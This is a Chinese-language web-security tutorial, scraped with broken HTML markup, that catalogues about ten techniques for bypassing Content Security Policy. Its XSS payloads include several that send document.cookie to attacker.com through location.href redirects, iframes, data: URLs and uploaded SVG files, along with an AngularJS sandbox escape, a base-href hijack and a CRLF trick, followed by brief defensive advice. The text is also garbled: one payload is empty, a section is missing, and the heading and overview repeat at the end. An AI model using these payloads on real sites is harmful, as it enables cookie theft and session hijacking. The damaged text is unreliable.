CSP绕过技术详解<\/h1>

0x01 CSP概述<\/h2>
CSP（Content Security Policy）即内容安全策略，是浏览器引入的一种安全机制，用于缓解潜在的跨站脚本(XSS)问题。其实质是白名单机制，对网站加载或执行的资源进行安全策略控制。<\/p>

0x02 CSP语法详解<\/h2>

基本结构<\/h3>

CSP头由多组策略组成，用分号分隔：<\/p>

Content-Security-Policy: default-src 'self' www.baidu.com; script-src 'unsafe-inline'
<\/code><\/pre>
主要策略指令<\/h3>

default-src<\/strong>：作为所有其他指令的备用<\/li>
script-src<\/strong>：限制所有JS脚本执行的位置，包括：

通过链接方式加载的脚本URL<\/li>
所有内联脚本<\/li>
各种方式的引用<\/li>
<\/ul>
<\/li>
<\/ol>
重要关键字<\/h3>

'none'<\/code>：不匹配任何URL<\/li>
'self'<\/code>：仅允许同源资源<\/li>
'unsafe-inline'<\/code>：允许内联资源（被认为不安全）<\/li>
'unsafe-eval'<\/code>：允许eval()等通过字符串创建代码的方法<\/li>
<\/ul>
0x03 CSP绕过技术<\/h2>
1. location跳转绕过<\/h3>
适用条件<\/strong>：<\/p>

可以执行任意JS脚本但CSP阻止数据带外<\/li>
CSP为script-src 'unsafe-inline'<\/code><\/li>
<\/ul>
Payload<\/strong>：<\/p>
<<\/span>script<\/span>><\/span>location<\/span>.href<\/span>=<\/span>'http:\/\/attacker.com\/cookie\/'<\/span>+<\/span>escape<\/span>(document.cookie<\/span>);<<\/span>\/script><\/span>
<\/span><\/span><\/code><\/pre>2. iframe绕过<\/h3>
适用条件<\/strong>：<\/p>

同源站点内存在两个页面<\/li>
一个页面有CSP保护，另一个无CSP保护且存在XSS漏洞<\/li>
<\/ul>
Payload<\/strong>：<\/p>
<<\/span>script<\/span>><\/span>
<\/span><\/span>var<\/span> iframe<\/span> =<\/span> document.createElement<\/span>('iframe'<\/span>);
<\/span><\/span>iframe<\/span>.src<\/span>=<\/span>".\/safe.php"<\/span>;
<\/span><\/span>document.body<\/span>.appendChild<\/span>(iframe<\/span>);
<\/span><\/span>setTimeout<\/span>(()=>location<\/span>.href<\/span>=<\/span>'http:\/\/attacker.com\/cookie\/'<\/span>+<\/span>escape<\/span>(document.cookie<\/span>),1000<\/span>);
<\/span><\/span><<\/span>\/script><\/span>
<\/span><\/span><\/code><\/pre>3. CDN绕过<\/h3>
适用条件<\/strong>：<\/p>

CDN服务商存在低版本JS库<\/li>
此CDN在CSP白名单中<\/li>
<\/ul>
示例<\/strong>（使用低版本AngularJS）：<\/p>
<script<\/span> src<\/span>=<\/span>https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/angular.js\/1.0.8\/angular.min.js<\/span>>
<\/span><\/span><\/script<\/span>>
<\/span><\/span><div<\/span> ng-app<\/span>>
<\/span><\/span>    {{constructor.constructor('alert(document.cookie)')()}}
<\/span><\/span><\/div<\/span>>
<\/span><\/span><\/code><\/pre>4. 站点可控静态资源绕过<\/h3>
适用条件<\/strong>：<\/p>

站点存在可控静态资源<\/li>
站点在CSP白名单中<\/li>
<\/ul>
示例<\/strong>（利用Google Analytics）：<\/p>
<meta<\/span> http-equiv<\/span>=<\/span>"Content-Security-Policy"<\/span> content<\/span>=<\/span>"default-src 'self'; script-src 'unsafe-eval' https:\/\/www.google-analytics.com"<\/span>>
<\/span><\/span><script<\/span> src<\/span>=<\/span>"https:\/\/www.google-analytics.com\/gtm\/js?id=GTM-PJF5W64"<\/span>><\/script<\/span>>
<\/span><\/span><\/code><\/pre>5. Base-uri绕过<\/h3>
适用条件<\/strong>：<\/p>

CSP script-src采用nonce<\/li>
只设置了default-src没有额外设置base-uri<\/li>
<\/ul>
Payload<\/strong>：<\/p>
<base<\/span> href<\/span>=<\/span>"https:\/\/attacker.com\/"<\/span>>
<\/span><\/span><\/code><\/pre>6. 不完整script标签绕过nonce<\/h3>
Payload<\/strong>：<\/p>
<script<\/span> src<\/span>=<\/span>data:text\/plain,location.href='http:\/\/attacker.com\/?cookie'+escape(document.cookie);<\/span>
<\/span><\/span><\/code><\/pre>7. SVG绕过<\/h3>
适用条件<\/strong>：<\/p>

存在上传功能且未过滤SVG<\/li>
<\/ul>
Payload<\/strong>：<\/p>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><svg<\/span> xmlns=<\/span>"http:\/\/www.w3.org\/2000\/svg"<\/span>><\/span>
<\/span><\/span><script><\/span>location.href='http:\/\/attacker.com\/?cookie'+escape(document.cookie);<\/script><\/span>
<\/span><\/span><\/svg><\/span>
<\/span><\/span><\/code><\/pre>8. 不完整的资源标签获取资源<\/h3>
适用条件<\/strong>：<\/p>

img-src设置为*<\/code><\/li>
<\/ul>
Payload<\/strong>：<\/p>

<\/span><\/span><\/code><\/pre>10. CRLF绕过<\/h3>
适用条件<\/strong>：<\/p>

页面存在CRLF漏洞<\/li>
可控点在CSP上方<\/li>
<\/ul>
方法<\/strong>：通过注入回车换行将CSP挤到HTTP返回体中<\/p>
防御建议<\/h2>

避免使用unsafe-inline<\/code>和unsafe-eval<\/code><\/li>
严格限制CDN来源和版本<\/li>
设置完整的CSP策略，包括base-uri等<\/li>
对所有上传内容进行严格过滤<\/li>
修复CRLF漏洞<\/li>
使用nonce或hash来限制内联脚本<\/li>
<\/ol>
通过理解这些绕过技术，可以更好地设计和实施CSP策略，有效防御XSS攻击。<\/p>

CSP绕过技术详解<\/h1>

0x01 CSP概述<\/h2> CSP（Content Security Policy）即内容安全策略，是浏览器引入的一种安全机制，用于缓解潜在的跨站脚本(XSS)问题。其实质是白名单机制，对网站加载或执行的资源进行安全策略控制。<\/p>

0x02 CSP语法详解<\/h2>

0x03 CSP绕过技术<\/h2>

0x01 CSP概述<\/h2>
CSP（Content Security Policy）即内容安全策略，是浏览器引入的一种安全机制，用于缓解潜在的跨站脚本(XSS)问题。其实质是白名单机制，对网站加载或执行的资源进行安全策略控制。<\/p>